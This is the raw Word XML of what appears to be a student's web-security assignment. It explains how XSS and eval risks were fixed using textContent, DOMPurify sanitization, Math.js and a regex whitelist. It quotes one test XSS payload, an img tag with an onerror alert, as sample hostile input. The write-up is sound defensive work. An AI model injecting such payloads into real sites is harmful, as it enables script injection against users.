    <w:p w14:paraId="2ABF4555" w14:textId="12C2A2B6" w:rsidR="00930046" w:rsidRDefault="00930046" w:rsidP="00930046">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>There are many ways to protect out code from attacks. I have implemented some for the above code examples.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8C8EAC" w14:textId="47005D58" w:rsidR="00ED7DE1" w:rsidRDefault="008E214C" w:rsidP="00ED7DE1">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>For code in the first question, when we are greeting the current user after getting name param from the URL, I am using ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>textContent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’ instead of ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">’ to prevent the param from rendering as a HTML code. The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>textContent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> will just render it as a string. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7409D534" w14:textId="6D197EB3" w:rsidR="008E214C" w:rsidRDefault="008E214C" w:rsidP="00ED7DE1">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="008E214C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="680E7CD0" wp14:editId="0ED71A52">
            <wp:extent cx="4563112"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112" cy="1409897"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFE9035" w14:textId="4A369EF0" w:rsidR="008E214C" w:rsidRDefault="008E214C" w:rsidP="008E214C">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Here is an output if we try to pass in exploit scripts:</w:t>
      </w:r>
      <w:r w:rsidRPr="008E214C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008E214C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4011D8ED" wp14:editId="36006BBC">
            <wp:extent cx="5622966" cy="2122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4523" cy="2141888"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6488A7" w14:textId="7BC298B8" w:rsidR="008E214C" w:rsidRDefault="00EE4EDF" w:rsidP="008E214C">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When taking user input I used a package called </w:t>
      </w:r>
      <w:r w:rsidR="00A15493">
        <w:t>‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r w:rsidR="00A15493">
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:t>urify</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A15493">
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to sanitize the user input before adding to out database and before rendering the comments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30804BC3" w14:textId="7299A4A3" w:rsidR="00EE4EDF" w:rsidRDefault="00EE4EDF" w:rsidP="008E214C">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE4EDF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29B1AE80" wp14:editId="20803C65">
            <wp:extent cx="4620270" cy="197195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1971950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4DF907" w14:textId="7E933F60" w:rsidR="00EE4EDF" w:rsidRDefault="00EE4EDF" w:rsidP="008E214C">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE4EDF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DCA624E" wp14:editId="782A01C8">
            <wp:extent cx="5715798" cy="1419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1419423"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADB52BB" w14:textId="58E96D77" w:rsidR="00A15493" w:rsidRDefault="00A15493" w:rsidP="00A15493">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>User input: ‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00A15493">
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A15493">
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A15493">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A15493">
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A15493">
        <w:t xml:space="preserve">=x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A15493">
        <w:t>onerror</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A15493">
        <w:t>="alert('Hacked!!!!!!!!!!!!!!!!!!!')"&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F35177" w14:textId="4A730D8A" w:rsidR="00EE4EDF" w:rsidRDefault="00EE4EDF" w:rsidP="008E214C">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Console log of the user input after it is sanitized:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC74F49" w14:textId="07192048" w:rsidR="00EE4EDF" w:rsidRDefault="00EE4EDF" w:rsidP="008E214C">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="495781C1" wp14:editId="3D199B63">
            <wp:extent cx="2285714" cy="10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5714" cy="1009524"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F828A5" w14:textId="703C2E83" w:rsidR="008B4155" w:rsidRDefault="008B4155" w:rsidP="008E214C">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FD138FF" w14:textId="44B47592" w:rsidR="008B4155" w:rsidRDefault="008B4155" w:rsidP="008E214C">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For question 2, I have replaced eval function all together because of how dangerous it can be. Instead of that I have imported Math.js library that can be safely used to evaluate the expressions. On top on that I also added a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Regexp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> check on the input to only allow user to input </w:t>
      </w:r>
      <w:r w:rsidR="00930046">
        <w:t>accepted characters only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439FBA32" w14:textId="1D4686B9" w:rsidR="00930046" w:rsidRDefault="00930046" w:rsidP="008E214C">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00930046">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A292DC0" wp14:editId="3B91E238">
            <wp:extent cx="4696915" cy="382979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6373" cy="3845658"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AB1A9C" w14:textId="6048EEE7" w:rsidR="00930046" w:rsidRDefault="00930046" w:rsidP="008E214C">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00930046">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69020B80" wp14:editId="2E7B3968">
            <wp:extent cx="4600701" cy="16328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1247" cy="1647247"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0093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4AAE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="608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92207"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="190A0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2C"/>
    <w:rsid w:val="001571B2"/>
    <w:rsid w:val="001F5A84"/>
    <w:rsid w:val="002F6616"/>
    <w:rsid w:val="003C2C19"/>
    <w:rsid w:val="00582F2C"/>
    <w:rsid w:val="00717E9E"/>
    <w:rsid w:val="0089748E"/>
    <w:rsid w:val="008B4155"/>
    <w:rsid w:val="008E214C"/>
    <w:rsid w:val="00930046"/>
    <w:rsid w:val="00952EE1"/>
    <w:rsid w:val="00A15493"/>
    <w:rsid w:val="00A52A69"/>
    <w:rsid w:val="00C75647"/>
    <w:rsid w:val="00CA7400"/>
    <w:rsid w:val="00ED7DE1"/>
    <w:rsid w:val="00EE4EDF"/>
    <w:rsid w:val="00FB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22CF"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{64BB552B-9EC7-479D-B341-E4820CA0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2C"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00582F2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CA7400"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CA7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57">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="286205668">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1033195265">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1347562370">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="116431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ryanShrestha/Project2"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D7CF3-8A17-44E0-970A-53D4E3CC9C7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145</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shrestha</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>simon shrestha</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-07-26T19:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-26T22:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>